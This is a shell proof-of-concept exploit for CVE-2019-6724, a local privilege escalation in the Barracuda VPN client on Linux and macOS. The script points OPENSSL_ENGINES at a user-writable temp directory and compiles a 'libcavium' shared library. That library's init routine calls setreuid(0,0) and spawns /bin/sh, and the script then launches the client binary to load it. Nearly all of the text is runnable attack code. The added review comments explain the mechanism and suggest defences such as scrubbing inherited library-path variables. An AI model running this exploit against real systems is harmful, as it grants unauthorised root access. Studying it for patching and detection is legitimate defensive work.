#!/bin/sh
# PoC for CVE-2019-6724 Barracuda VPN Client Privilege Escalation
# Linux / macOS
# Rich Mirch
#
# Version tested:
#
# Barracuda Networks VPN client version: PhionVersionString 5.0.2.5
#
# OS tested:
#
# CentOS Linux release 7.4.1708 (Core)
# macOS 10.14.2
#
# Overview: the script points OPENSSL_ENGINES at a user-writable directory,
# builds a shared library named libcavium into it, and then starts the VPN
# client binary.
# NOTE(review): the escalation presumably depends on the client running with
# elevated privileges while still honouring OPENSSL_ENGINES from the caller's
# environment; neither is visible here, so confirm against the vendor advisory.
# Defensive takeaways: a privileged binary should ignore or scrub
# library-search variables inherited from an unprivileged caller, and the
# client being started with OPENSSL_ENGINES set to a user-writable path is a
# useful signal to alert on.

# Staging directory under /tmp; mktemp -d gives it a random suffix.
STAGE=$(mktemp -d /tmp/woot.XXXXXX)
# ${STAGE?} aborts the script if STAGE is unset.
cd ${STAGE?} || exit 1
# OPENSSL_ENGINES names the directory OpenSSL searches for loadable engine
# modules; exporting it makes every child process inherit the override.
export OPENSSL_ENGINES=${STAGE?}
# Write the library source. Its single function sets the real and effective
# uid to 0 and then replaces the process with /bin/sh.
cat >woot.c<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
void woot(){
setreuid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
EOF
# Kernel name, used below to pick the platform-specific link step and path.
u=$(uname)
# Compile to a position-independent object so it can be linked as a shared
# library on either platform.
gcc -fPIC -o woot.o -Wall -c woot.c
if [[ $u = "Linux" ]]
then
# -init,woot registers woot as the library's initialisation routine, so it
# runs when the library is loaded rather than when a symbol is called.
# NOTE(review): libcavium is presumably the engine name the client asks
# OpenSSL to load; that lookup is not shown here, so confirm.
gcc -Wall -shared -Wl,-soname,libcavium.so -Wl,-init,woot -o ${STAGE?}/libcavium.so woot.o
# Start the client with the overridden engine directory in its environment.
/usr/local/bin/barracudavpn
elif [[ $u = "Darwin" ]]
then
# macOS variant: built as a dylib, with the underscore-prefixed symbol name
# passed to -init.
gcc -Wall -dynamiclib -Wl,-init,_woot -o ${STAGE?}/libcavium.dylib woot.o
/Applications/BarracudaVPNClient.app/Contents/MacOS/barracudavpn.engine
else
echo "Error: OS not supported"
# Exits before the cleanup below, so the staging directory is left behind on
# this path.
exit 1
fi
# Remove the staging directory; only reached after the client process returns.
rm -rf ${STAGE?}